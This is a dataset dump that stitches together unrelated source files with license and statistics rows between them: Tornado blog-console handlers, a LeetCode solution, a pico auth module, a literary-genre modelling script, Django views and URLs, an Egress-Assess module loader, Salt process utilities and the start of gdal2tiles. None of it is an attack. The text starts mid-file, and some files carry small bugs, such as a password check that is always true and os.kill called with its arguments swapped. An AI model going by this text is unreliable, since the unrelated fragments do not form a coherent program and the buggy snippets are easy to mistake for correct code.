def get(self, UID):
form = BlogWriterForm(self)
catalog_list = self.get_catalogs()
blogshow_query_variables = {
"uid": UID,
}
blogshow_query_variables = json.dumps(blogshow_query_variables)
r = self.q(self.BLOG_SHOW_QUERY, blogshow_query_variables)
blog = r.get("data").get("blog").get("article")
# print("blog==>",blog)
self.render("blog/console/blog_edit.html",
form=form, blog=blog, catalog_list=catalog_list)
@authenticated
def post(self, UID):
form = BlogWriterForm(self)
catalog_list = self.get_catalogs()
blogshow_query_variables = {
"uid": UID,
}
r = self.q(self.BLOG_SHOW_QUERY, blogshow_query_variables)
blog = r.get("data").get("blog").get("article")
if not form.validate():
error = form.errors
# tag_list = []
# tag_uid = form.tags.data.split(",")[::2]
# tag_name = form.tags.data.split(",")[1::2]
# for u,n in zip(tag_uid, tag_name):
# tag_list.append((u,n))
return self.render("blog/console/blog_edit.html",
form=form,blog=blog,
catalog_list=catalog_list,
error = error)
blogedit_query_variables = {
"input": {
"clientMutationId": "1",
"uid": "",
"title": "",
"abstract": "",
"body": "",
"is_public": "",
"catalog_uid": "",
"tags": ""
}
}
blogedit_query_variables["input"]["is_public"] = form.is_public.data
blogedit_query_variables["input"]["uid"] = UID
blogedit_query_variables["input"]["title"] = form.title.data
blogedit_query_variables["input"]["abstract"] = form.abstract.data
blogedit_query_variables["input"]["body"] = form.body.data
blogedit_query_variables["input"]["catalog_uid"] = form.catalog_uid.data
blogedit_query_variables["input"]["tags"] = form.tags.data.split(",")[::2]
blogedit_query_variables = json.dumps(blogedit_query_variables)
r = self.q(self.BLOG_EDIT_QUERY, blogedit_query_variables)
self.redirect("/console/blog/article/" + UID)
class BlogDelHandler(RequestHandler):
BLOG_DEL_QUERY = '''
mutation MyMutaion (
$input_0: BlogArticleDeleteInput!
) {
blog_article_delete(input: $input_0) {
status
message
}
}'''
@authenticated
def get(self, UID):
blogdel_query_variables = {
"input_0": {
"clientMutationId": "1",
"uid": ""
}
}
blogdel_query_variables["input_0"]["uid"] = UID
blogdel_query_variables = json.dumps(blogdel_query_variables)
r = self.q(self.BLOG_DEL_QUERY, blogdel_query_variables)
# print("status===>",r)
status = r.get("data").get("blog_article_delete").get('status')
self.redirect("/console/blog/article")
# console 文章部分结束
# console 目录部分开始
class BlogCatalogindexHandler(RequestHandler):
BLOG_CATALOG_LIST_QUERY = '''
query BlogCatalogs{
blog{id,...F1}
}
fragment F1 on BlogApi{
catalogs {
name
summary
body_html
created
updated
uid
public_article_count
private_article_count
}
}'''
@authenticated
def get(self):
r = self.q(self.BLOG_CATALOG_LIST_QUERY)
catalog_list = r.get("data").get("blog").get("catalogs")
self.render('/blog/console/catalogs.html',
catalog_list=catalog_list,
get_local_time_string=get_local_time_string )
class BlogCatalogWriterHandler(RequestHandler):
pass
#
# BLOG_CATALOG_WRITER_QUERY='''
# mutation BlogCatalogNew(
# $input_0: BlogCatalogNewInput!
# ) {
# blog_catalog_new(input: $input_0) {
# catalog {
# uid
# body_html
# name
# public_article_count
# private_article_count
# created
# updated
# }
# }
# }'''
#
# @authenticated
# def get(self):
# form = BlogCatalogWriterForm(self)
# self.render("blog/console/catalog_writer.html")
#
# @authenticated
# def post(self):
# form = BlogCatalogWriterForm(self)
# if not form.validate():
# error = form.errors
# # print("error==>",error)
# return self.render("blog/console/catalog_writer.html",
# form=form, error=error)
#
# catalogwriter_query_variables = {
# "input_0":
# {
# "clientMutationId": "1",
# "name": "",
# "summary": "",
# "body": "",
# }
# }
#
# catalogwriter_query_variables["input_0"]["name"] = form.name.data
# catalogwriter_query_variables["input_0"]["summary"] = form.summary.data
# catalogwriter_query_variables["input_0"]["body"] = form.body.data
#
# r = self.q(self.BLOG_CATALOG_WRITER_QUERY, catalogwriter_query_variables)
# # print("r===>",r)
# if r.get("errors"):
# errors = r.get("errors")
# error = deal_errors(errors)
# self.render("blog/console/catalog_writer.html",
# form=form, error=error)
#
# UID = r.get("data").get("blog_catalog_new").get("catalog")["uid"]
# self.redirect("/console/blog/catalog/" + UID)
class BlogCatalogShowHandler(RequestHandler):
CATALOG_SHOW_QUERY = '''
query BlogCatalog(
$uid: String!
){
blog{id,...F1}
}
fragment F1 on BlogApi{
catalog: catalog_u(
uid: $uid
) {
body
name
summary
public_article_count
private_article_count
created
updated
uid
}
}'''
@authenticated
def get(self, UID):
catalogshow_query_variables = {
"uid": UID,
}
catalogshow_query_variables = json.dumps(catalogshow_query_variables)
r = self.q(self.CATALOG_SHOW_QUERY, catalogshow_query_variables)
catalog = r.get("data").get("blog").get("catalog")
self.render("blog/console/catalog_show.html", catalog=catalog, get_local_time_string=get_local_time_string )
class BlogCatalogEditHandler(RequestHandler):
CATALOG_EDIT_QUERY = '''
mutation MyMutation(
$input: BlogCatalogEditInput!
) {
blog_catalog_edit(input: $input) {
catalog {
id
uid
name
}
}
}'''
CATALOG_SHOW_QUERY = '''
query BlogCatalog(
$uid: String!
){
blog{id,...F1}
}
fragment F1 on BlogApi{
catalog: catalog_u(
uid: $uid
) {
body
name
summary
public_article_count
private_article_count
created
updated
}
}'''
@authenticated
def get(self, UID):
form = BlogCatalogWriterForm(self)
catalog_query_variables = {
"uid": UID,
}
catalog_query_variables = json.dumps(catalog_query_variables)
r = self.q(self.CATALOG_SHOW_QUERY, catalog_query_variables)
catalog = r.get("data").get("blog").get("catalog")
self.render("blog/console/catalog_edit.html", form=form, catalog=catalog)
@authenticated
def post(self, UID):
form = BlogCatalogWriterForm(self)
if not form.validate():
return self.render("blog/console/catalog_edit.html", form=form)
catalogedit_query_variables = {
"input": {
"clientMutationId": "1",
"uid": "",
"name": "",
"summary": "",
"body": ""
}
}
catalogedit_query_variables["input"]["uid"] = UID
catalogedit_query_variables["input"]["name"] = form.name.data
catalogedit_query_variables["input"]["summary"] = form.summary.data
catalogedit_query_variables["input"]["body"] = form.body.data
catalogedit_query_variables = json.dumps(catalogedit_query_variables)
r = self.q(self.CATALOG_EDIT_QUERY, catalogedit_query_variables)
self.redirect("/console/blog/catalog/" + UID)
class BlogCatalogDelHander(RequestHandler):
CATA_DEL_QUERY = '''
mutation MyMutation(
$input: BlogCatalogDeleteInput!
) {
blog_catalog_delete(input: $input) {
status
message
}
}'''
@authenticated
def get(self, UID):
catalogdel_query_variables = {
"input": {
"clientMutationId": "1",
"uid": ""
}
}
catalogdel_query_variables["input"]["uid"] = UID
catalogdel_query_variables = json.dumps(catalogdel_query_variables)
r = self.q(self.CATA_DEL_QUERY, catalogdel_query_variables)
del_info = r.get("data").get("blog_catalog_delete")
status = del_info.get("status")
error = del_info.get("message")
current_url = self.request.uri
back_url = "/console/blog/catalog"
if not status:
self.render("/error.html", error=error, current_url=current_url,
back_url=back_url)
self.redirect("/console/blog/catalog")
# console 目录部分结束
# console Tag部分开始
class BlogTagindexHandler(RequestHandler):
BLOG_TAG_LIST_QUERY = '''
query BlogTags(
$first: Int
$sort_by: String
$sort_direction: String
){
blog{id,...F1}
}
fragment F1 on BlogApi{
tags(
first: $first,
sort_by: $sort_by,
sort_direction: $sort_direction
) {
edges {
node {
id
name
summary
body
count
created
updated
uid
}
}
pageInfo {
hasPreviousPage
startCursor
endCursor
hasNextPage
}
}
}'''
@authenticated
def get(self):
r = self.q(self.BLOG_TAG_LIST_QUERY)
tag_list = r.get("data").get("blog").get("tags").get("edges")
self.render('/blog/console/tags.html',
tag_list=tag_list,
get_local_time_string=get_local_time_string)
# console Tag部分结束
| mit | 4,445,130,281,428,235,300 | 25.143275 | 116 | 0.546919 | false | 3.626445 | false | false | false |
saisankargochhayat/algo_quest | leetcode/430.FlatternADoubleLinkedList/soln.py | 1 | 1710 | """
# Definition for a Node.
class Node:
def __init__(self, val, prev, next, child):
self.val = val
self.prev = prev
self.next = next
self.child = child
"""
class Solution:
def flatten(self, head: 'Node') -> 'Node':
start = head
head = head
while head != None:
# we dont need to anything in this case.
if head.child is None:
head = head.next
else:
# Flatten the list here.
head = self.flattenChildList(head, head.child, head.next)
# self.checkAnswer(start)
return start
# def checkAnswer(self, head):
# while head:
# print(head.val, head.prev)
# head = head.next
# Now we take the source node and its start would point to child list, and child node to source node.
# The child list's end node points to nextNode, and nextNode prev a last node.
# One sneaky catch - if nextNode is empty point return head.
def flattenChildList(self, sourceNode, childNode, nextNode):
head = childNode
sourceNode.next = childNode
sourceNode.child = None
childNode.prev = sourceNode
while head != None:
# End of the child list.
if head.next == None:
head.next = nextNode
if nextNode is None:
return head
nextNode.prev = head
return nextNode
elif head.child is None:
head = head.next
else:
head = self.flattenChildList(head, head.child, head.next)
return nextNode
| apache-2.0 | 319,589,736,364,629,700 | 32.529412 | 106 | 0.533918 | false | 4.407216 | false | false | false |
AdiPersonalWorks/ATOS_GOM_SystemPrototyping | pico/auth.py | 1 | 1890 | import pico
from pico import PicoError
class NotAuthorizedError(PicoError):
def __init__(self, message=''):
PicoError.__init__(self, message)
self.response.status = "401 Not Authorized"
self.response.set_header("WWW-Authenticate", "Basic")
class InvalidSessionError(PicoError):
def __init__(self, message=''):
PicoError.__init__(self, message)
self.response.status = "440 Invalid Session"
class Bunch:
def __init__(self, **kwds):
self.__dict__.update(kwds)
class object(pico.object):
account_manager = None
__headers__ = {'X-SESSION-ID': ''}
def __init__(self):
super(object, self).__init__()
self.user = None
if type(self.account_manager) == dict:
self.account_manager = Bunch(**self.account_manager)
request = pico.get_request()
if 'HTTP_AUTHORIZATION' in request:
try:
auth_header = request.get('HTTP_AUTHORIZATION')
scheme, data = auth_header.split(None, 1)
assert(scheme == 'Basic')
username, password = data.decode('base64').split(':', 1)
self.user = self._get_user(username, password)
except Exception, e:
raise NotAuthorizedError(str(e))
elif 'HTTP_X_SESSION_ID' in request:
session_id = request.get('HTTP_X_SESSION_ID')
self.user = self._get_session(session_id)
elif 'DUMMY_REQUEST' in request:
pass
else:
raise NotAuthorizedError("No username or password supplied")
def _get_user(self, username, password):
if self.account_manager:
return self.account_manager._get_user(username, password)
def _get_session(self, session_id):
if self.account_manager:
return self.account_manager._get_session(session_id)
| mit | 5,647,580,370,093,337,000 | 32.75 | 72 | 0.589947 | false | 3.970588 | false | false | false |
tedunderwood/horizon | chapter3/code/reproduce_fictional_prestige.py | 1 | 7078 | #!/usr/bin/env python3
# reproduce_fictional_prestige.py
# Scripts to reproduce models
# used in Chapter Three,
# The Directions of Literary Change.
import csv, os, sys, pickle, math
# we add a path to be searched so that we can import
# versatiletrainer, which will do most of the work
# Versatiletrainer, and the modules it will in turn call,
# are publicly available in this github repo:
# https://github.com/tedunderwood/overlappingcategories
# mental note: when you file the book repo with Zenodo,
# a copy of the overlappingcategories repo also needs to
# be frozen
sys.path.append('/Users/tunder/Dropbox/python/logistic')
import versatiletrainer as train
import pandas as pd
# sourcefolder =
# extension =
# metadatapath =
# outputpath = '/Users/tunder/Dropbox/GenreProject/python/reception/fiction/predictions.csv'
def genre_gridsearch(metadatapath, modelname, c_range, ftstart, ftend, ftstep, positive_tags = ['elite'], negative_tags = ['vulgar'], excl_below = 1700, excl_above = 2000):
# Function does a gridsearch to identify an optimal number of features and setting of
# the regularization constant; then produces that model.
# sourcefolder = '/Users/tunder/Dropbox/GenreProject/python/reception/fiction/fromEF/'
sourcefolder = '../sourcefiles/'
extension = '.tsv'
#metadatapath = '/Users/tunder/Dropbox/GenreProject/python/reception/fiction/prestigeficmeta.csv'
vocabpath = '/Users/tunder/Dropbox/fiction/lexicon/' + modelname + '.txt'
if os.path.exists(vocabpath):
print('Vocabulary for ' + modelname + ' already exists. Using it.')
outputpath = '../results/' + modelname + '.csv'
# We can simply exclude volumes from consideration on the basis on any
# metadata category we want, using the dictionaries defined below.
## EXCLUSIONS.
excludeif = dict()
excludeifnot = dict()
excludeabove = dict()
excludebelow = dict()
excludebelow['firstpub'] = excl_below
excludeabove['firstpub'] = excl_above
sizecap = 700
# CLASSIFY CONDITIONS
# print()
# print("You can also specify positive tags to be excluded from training, and/or a pair")
# print("of integer dates outside of which vols should be excluded from training.")
# print("If you add 'donotmatch' to the list of tags, these volumes will not be")
# print("matched with corresponding negative volumes.")
# print()
# ## testphrase = input("Comma-separated list of such tags: ")
testphrase = ''
testconditions = set([x.strip() for x in testphrase.split(',') if len(x) > 0])
datetype = "firstpub"
numfeatures = ftend
regularization = .000075
# linting the code would get rid of regularization, which is at this
# point an unused dummy parameter
paths = (sourcefolder, extension, metadatapath, outputpath, vocabpath)
exclusions = (excludeif, excludeifnot, excludebelow, excludeabove, sizecap)
classifyconditions = (positive_tags, negative_tags, datetype, numfeatures, regularization, testconditions)
modelparams = 'logistic', 12, ftstart, ftend, ftstep, c_range
matrix, rawaccuracy, allvolumes, coefficientuples = train.tune_a_model(paths, exclusions, classifyconditions, modelparams)
print('If we divide the dataset with a horizontal line at 0.5, accuracy is: ', str(rawaccuracy))
tiltaccuracy = train.diachronic_tilt(allvolumes, 'linear', [])
print("Divided with a line fit to the data trend, it's ", str(tiltaccuracy))
def applymodel(modelpath, metadatapath, outpath):
sourcefolder = '/Users/tunder/Dropbox/GenreProject/python/reception/fiction/fromEF'
extension = '.tsv'
newmetadict = train.apply_pickled_model(modelpath, sourcefolder, extension, metadatapath)
print('Got predictions for that model.')
newmetadict.to_csv(outpath)
def comparison(selfmodel, othermodel, modelname):
totalvolumes = 0
right = 0
for v in selfmodel.index:
realgenre = selfmodel.loc[v, 'realclass']
v = str(v)
otherprediction = othermodel.loc[v, modelname]
if realgenre > .5 and otherprediction > 0.5:
right += 1
elif realgenre < .5 and otherprediction < 0.5:
right += 1
totalvolumes +=1
return totalvolumes, right
def getacc(filelist):
allofem = 0
allright = 0
for afile in filelist:
df = pd.read_csv(afile)
totalcount = len(df.realclass)
tp = sum((df.realclass > 0.5) & (df.logistic > 0.5))
tn = sum((df.realclass <= 0.5) & (df.logistic <= 0.5))
fp = sum((df.realclass <= 0.5) & (df.logistic > 0.5))
fn = sum((df.realclass > 0.5) & (df.logistic <= 0.5))
assert totalcount == (tp + fp + tn + fn)
allofem += totalcount
allright += (tp + tn)
return allright / allofem
if __name__ == '__main__':
args = sys.argv
command = args[1]
if command == 'littlemagazines':
c_range = [.00009, .0002, .0004, .0008, .0012, .002, .004, .008, .012, 0.3, 0.8, 2]
featurestart = 1500
featureend = 4000
featurestep = 100
genre_gridsearch('/Users/tunder/Dropbox/GenreProject/python/reception/fiction/littlemagazines.csv', 'littlemagazinespost1919', c_range, featurestart, featureend, featurestep, positive_tags = ['elite'], negative_tags = ['vulgar'], excl_below = 1800, excl_above = 2000)
elif command == 'apply_quarter_century_models':
# We've previously trained models for each quarter-century
# of the fiction corpus: 1850-74, 75-99, and so on.
# Now we need to apply those models to the whole corpus
# in order to see how good their predictions are.
models = []
outpaths = []
for i in range (1850, 1950, 25):
modelpath = '../models/segment' + str(i) + '.pkl'
models.append(modelpath)
outpath = '../results/segment' + str(i) + '.applied.csv'
outpaths.append(outpath)
metadatapath = '../metadata/prestigeficmeta.csv'
for m, o in zip(models, outpaths):
applymodel(m, metadatapath, o)
elif command == 'gender_balance_fiction':
c_range = [.00009, .0002, .0004, .0008, .0012, .002, .004, .008, .012, 0.3, 0.8, 2]
featurestart = 1200
featureend = 4500
featurestep = 100
genre_gridsearch('../metadata/genderbalancedfiction.csv', 'gender_balanced_fiction', c_range, featurestart, featureend, featurestep, positive_tags = ['elite'], negative_tags = ['vulgar'], excl_below = 1800, excl_above = 2000)
elif command == 'nation_balance_fiction':
c_range = [.00009, .0002, .0004, .0008, .0012, .002, .004, .008, .012, 0.3, 0.8, 2]
featurestart = 1200
featureend = 4000
featurestep = 100
genre_gridsearch('../metadata/nationbalancedfiction.csv', 'nation_balanced_fiction', c_range, featurestart, featureend, featurestep, positive_tags = ['elite'], negative_tags = ['vulgar'], excl_below = 1800, excl_above = 2000)
| mit | 5,076,962,015,525,809,000 | 38.541899 | 275 | 0.658519 | false | 3.556784 | false | false | false |
defstryker/Hex-Omega | users/Xav/views.py | 1 | 2547 | from users.views import *
from .add_leader_form import *
from django.db.utils import IntegrityError
def create_leader_user(request, username):
form = LeaderForm()
if request.method == 'POST':
form = LeaderForm(request.POST)
if form.is_valid():
username = request.POST.get('username')
first_name = request.POST.get('first_name')
last_name = request.POST.get('last_name')
email = request.POST.get('email')
password = get_default_password()
try:
user = LeaderUser.objects.create_user(username=username, first_name=first_name, last_name=last_name,
email=email, password=password)
except IntegrityError as e:
return render(request, 'users/leaderuser_form.html',
{'form': form, 'mail_error': 'The email is not unique!'})
user.set_password(password)
mail_kickoff(user, password)
user.save()
update_session_auth_hash(request, request.user)
return redirect('display_admin', request.user.username)
return render(request, 'users/leaderuser_form.html', {'form': form})
@login_required
def display_leader_detail(request, username):
user = LeaderUser.objects.get(username__iexact=username)
return render(request, 'users/leaderdetail.html', {'user': user})
@login_required
def update_leader_detail(request, username):
user = LeaderUser.objects.get(username__iexact=username)
form_data = {'username': user.username, 'first_name': user.first_name, 'last_name': user.last_name,
'email': user.email,
'password': user.password, 'bio': user.bio}
form = UpdateLeaderForm(request.POST, initial=form_data)
if request.method == 'POST':
print(form.errors)
if form.is_valid():
user.first_name = request.POST.get('first_name')
user.last_name = request.POST.get('last_name')
user.email = request.POST.get('email')
pw = request.POST['password']
if (pw is not '' or pw is not None) and len(pw.strip()) >= 8:
user.set_password(pw)
user.bio = request.POST.get('bio')
user.save()
update_session_auth_hash(request, request.user)
return redirect('display_leader', username)
return render(request, 'users/update_leader_form.html', {'user': user, 'form': form, 'errors': form.errors})
| mit | 4,510,525,064,045,254,000 | 41.45 | 116 | 0.599136 | false | 3.918462 | false | false | false |
jal-stats/django | jal_stats/jal_stats/urls.py | 1 | 1604 | """jal_stats URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
# from rest_framework import routers
from rest_framework_nested import routers
from stats import views as stats_views
router = routers.SimpleRouter()
# router.register(r'users', stats_views.UserViewSet)
router.register(r'activities', stats_views.ActivityViewSet)
activities_router = routers.NestedSimpleRouter(router,
r'activities',
lookup='activity')
activities_router.register(r'stats',
stats_views.StatViewSet,
base_name='activities-stats')
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^docs/', include('rest_framework_swagger.urls')),
url(r'^api/', include(router.urls)),
url(r'^api/', include(activities_router.urls)),
url(r'^api-auth/',
include('rest_framework.urls', namespace='rest_framework')),
]
| mit | 5,263,043,419,280,896,000 | 33.869565 | 77 | 0.650873 | false | 3.893204 | false | false | false |
3L3N4/Egress-Assess | common/orchestra.py | 1 | 1550 | '''
This is the conductor which controls everything
'''
import glob
import imp
from protocols.servers import *
from protocols.clients import *
from datatypes import *
class Conductor:
def __init__(self):
# Create dictionaries of supported modules
# empty until stuff loaded into them
self.client_protocols = {}
self.server_protocols = {}
self.datatypes = {}
def load_client_protocols(self, command_line_object):
for name in glob.glob('protocols/clients/*.py'):
if name.endswith(".py") and ("__init__" not in name):
loaded_client_proto = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
self.client_protocols[name] = loaded_client_proto.Client(command_line_object)
return
def load_server_protocols(self, command_line_object):
for name in glob.glob('protocols/servers/*.py'):
if name.endswith(".py") and ("__init__" not in name):
loaded_server_proto = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
self.server_protocols[name] = loaded_server_proto.Server(command_line_object)
return
def load_datatypes(self, command_line_object):
for name in glob.glob('datatypes/*.py'):
if name.endswith(".py") and ("__init__" not in name):
loaded_datatypes = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
self.datatypes[name] = loaded_datatypes.Datatype(command_line_object)
return
| gpl-3.0 | 3,691,353,084,157,195,300 | 35.046512 | 97 | 0.610968 | false | 4.015544 | false | false | false |
smallyear/linuxLearn | salt/salt/utils/process.py | 1 | 11798 | # -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import
import os
import sys
import time
import types
import signal
import subprocess
import logging
import multiprocessing
import threading
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
def add_process(self, tgt, args=None, kwargs=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
process.start()
# create a nicer name for the debug log
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}.{1}.{2}'.format(
tgt.__module__,
tgt.__class__,
tgt.__name__,
)
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
signal.signal(signal.SIGTERM, self.kill_children)
while True:
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows():
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug(('Process of pid {0} died, not a known'
' process, will not restart').format(pid))
continue
self.restart_process(pid)
else:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for p_map in six.itervalues(self._process_map):
p_map['Process'].terminate()
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
# if anyone is done after
for pid in self._process_map:
try:
os.kill(signal.SIGKILL, pid)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
| apache-2.0 | -4,748,247,303,098,665,000 | 31.955307 | 99 | 0.544075 | false | 4.348691 | false | false | false |
grueni75/GeoDiscoverer | Source/Platform/Target/Android/core/src/main/jni/gdal-3.2.1/swig/python/scripts/gdal2tiles.py | 1 | 134939 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ******************************************************************************
# $Id: gdal2tiles.py d712a530aa1b0dabf9717dd935996dd7b9fd8ced 2020-11-15 15:12:13 +0100 Even Rouault $
#
# Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/)
# Support: BRGM (http://www.brgm.fr)
# Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory.
# - generate Google Earth metadata (KML SuperOverlay)
# - generate simple HTML viewer based on Google Maps and OpenLayers
# - support of global tiles (Spherical Mercator) for compatibility
# with interactive web maps a la Google Maps
# Author: Klokan Petr Pridal, klokan at klokan dot cz
# Web: http://www.klokan.cz/projects/gdal2tiles/
# GUI: http://www.maptiler.org/
#
###############################################################################
# Copyright (c) 2008, Klokan Petr Pridal
# Copyright (c) 2010-2013, Even Rouault <even dot rouault at spatialys.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ******************************************************************************
from __future__ import print_function, division
import math
from multiprocessing import Pool
from functools import partial
import glob
import json
import os
import tempfile
import threading
import shutil
import sys
from uuid import uuid4
from xml.etree import ElementTree
from osgeo import gdal
